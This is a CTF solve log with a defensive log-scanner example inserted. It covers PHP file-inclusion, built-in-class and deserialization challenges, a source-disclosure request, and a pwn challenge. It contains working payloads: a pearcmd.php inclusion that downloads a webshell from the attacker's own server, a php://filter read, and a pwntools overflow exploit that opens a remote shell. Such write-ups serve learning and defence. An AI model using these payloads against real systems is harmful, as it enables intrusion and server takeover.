Played around with it a bit; quite a fun competition, and I learned a lot.
Jotting down a solve log; I'll go back and reproduce the challenges I didn't get to later.
0x00 ezinclude
Including the index page revealed pearcmd.php: pear picks up its command-line arguments in pearcmd.php, and since pearcmd.php is present, pear is installed in this environment.
PHP's pear extension is a command-line extension manager, installed by default at /usr/local/lib/php/pearcmd.php. From a shell it is run with pear or php /usr/local/lib/php/pearcmd.php. Although it does not live under the web root, a file-inclusion vulnerability lets this command-line tool be run anyway.
Host the webshell on your own VPS and have the target download it.
Exploitation:
sdpc=/usr/local/lib/php/pearcmd.php&+install+-R+/tmp+http://<ip>/8848.php
Then request ?sdpc=/tmp/tmp/pear/download/8848.php; AntSword connects successfully, and the flag is in /var/www/public/flag.php.
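As an added defender-side example (not part of the original writeup), here is a small Python scanner that flags both stages of the pearcmd.php inclusion trick in web-server access logs: the include that reaches pearcmd.php, and the later include of the file pear dropped under its download directory. The log lines are constructed, and the IP addresses in them are placeholders.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (not from the original post). 10.0.0.9 plays
# the two stages described above; the other client is benign noise.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?sdpc=about.php HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?sdpc=/usr/local/lib/php/pearcmd.php&+install+-R+/tmp+http://203.0.113.7/8848.php HTTP/1.1" 200 1024
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?sdpc=/tmp/tmp/pear/download/8848.php HTTP/1.1" 200 64
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?sdpc=contact.php HTTP/1.1" 200 480
"""

# Common log format: client, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Indicators for the two stages: a file-inclusion parameter that reaches
# pearcmd.php, and a later include of whatever pear saved under download/.
STAGES = (
    ("pearcmd.php", "include parameter reaches pearcmd.php (pear run through LFI)"),
    ("/pear/download/", "include of a file under pear's download directory"),
)

def scan_access_log(text):
    """Return (client_ip, timestamp, description) for each request whose
    decoded query string contains one of the pearcmd indicators."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip, don't crash
        ip, ts, _method, target, _status = m.groups()
        query = target.partition("?")[2]
        # unquote_plus maps '+' to spaces and decodes %xx escapes, so the
        # "+install+-R+/tmp" argument form cannot hide behind URL encoding.
        decoded = unquote_plus(query).lower()
        for needle, why in STAGES:
            if needle in decoded:
                findings.append((ip, ts, why))
    return findings

def suspicious_clients(text):
    """Sorted client IPs that triggered at least one indicator."""
    return sorted({ip for ip, _ts, _why in scan_access_log(text)})

if __name__ == "__main__":
    for ip, ts, why in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip}: {why}")
```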
0x01 ezphp
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$g = $_GET['g'];
$t = $_GET['t'];
echo new $g($t);
```
Seeing echo new $g($t); suggests the challenge is about abusing PHP built-in classes, so consider the SplFileObject class: the echo triggers SplFileObject's __toString() method.
?g=SplFileObject&t=php://filter/read=convert.base64-encode/resource=flag.php
0x02 funnyPHP
PHP <= 7.4.21 remote source-code disclosure vulnerability.
Remove the Content-Length header and send:

```http
GET /puzzle.php HTTP/1.1
Host: 47.104.14.160:3345

GET / HTTP/1.1
```

This returns the source of puzzle.php:
```php
<?php
error_reporting(0);
class A{
    public $sdpc = ["welcome" => "yeah, something hidden."];
    function __call($name, $arguments) {
        $this->$name[$name]();
    }
}
class B{
    public $a;
    function __construct() {
        $this->a = new A();
    }
    function __toString() {
        echo $this->a->sdpc["welcome"];
    }
}
class C{
    public $b;
    protected $c;
    function __construct(){
        $this->c = new B();
    }
    function __destruct(){
        $this->b ? $this->c->sdpc('welcom') : 'welcome!'.$this->c;
    }
}
class Evil{
    function getflag() {
        echo file_get_contents('/fl4g');
    }
}
if(isset($_POST['sdpc'])) {
    unserialize($_POST['sdpc']);
} else {
    serialize(new C());
}
?>
```
Here it is again, the nasty deserialization Puzzle Bobble > <.
0x03 ez_stack
main:
```c
int __cdecl v(int a1)
{
  char s[68]; // [esp+0h] [ebp-48h] BYREF

  io();
  printf("Password reset 2.0 : ");
  gets(s);
  if ( a1 != -20221119 )
    return puts(asc_804A02E);
  puts(asc_804A01E);
  return system("/bin/sh");
}
```
From the code, reaching return system("/bin/sh") requires a1 to equal -20221119.
The cmp is at .text address 080492B3; set a breakpoint there and debug after overflowing:
```python
from pwn import *

io = process("./ez_stack")
gdb.attach(io, "b * 0x80492B3")
sleep(1)
io.recvuntil(b"Password reset 2.0 : ")
payload = cyclic(100)  # de Bruijn pattern to locate the overwrite offset
io.sendline(payload)
io.interactive()
```
Inspecting the value at ebp+0x8 and running cyclic -l 0x61616175
shows it lands at position 81 (80 bytes precede it).
```python
from pwn import *

io = remote('1.13.251.106', '8000')
#io = process("./ez_stack")
#gdb.attach(io,"b * 0x80492B3")
#sleep(1)
io.recvuntil(b"Password reset 2.0 : ")
# 80 bytes of padding, then a1 = -20221119 as a 32-bit two's complement value
payload = b'a' * 80 + p32(0xfecb7341)
io.sendline(payload)
io.interactive()
```
0x04 CheckIn
282422904082982258621075610259452215824075271484821245626055284049965141753838118483499225118037659155776469308266679236514939371151200503486860900710638249138056870980395564136760046944176702722154502092895865522544199762580857041717582699398798829888596539858995029585412945532785867079274113878154724845910389733183058666310229884356997245
Converted to hexadecimal:
4d752e4368656e5f69735f7468655f6d6f73745f68616e64736f6d655f626f795f696e5f534450435f616e645f68655f646f6e27745f686176655f6769726c667269656e642121212121212142795f7468655f7761795f686572655f69735f796f75725f666c61677b37303562633765612d653965312d343939362d613238662d6464393632613737373137307d
Converted to characters:
Mu.Chen_is_the_most_handsome_boy_in_SDPC_and_he_don't_have_girlfriend!!!!!!!By_the_way_here_is_your_flag{705bc7ea-e9e1-4996-a28f-dd962a777170}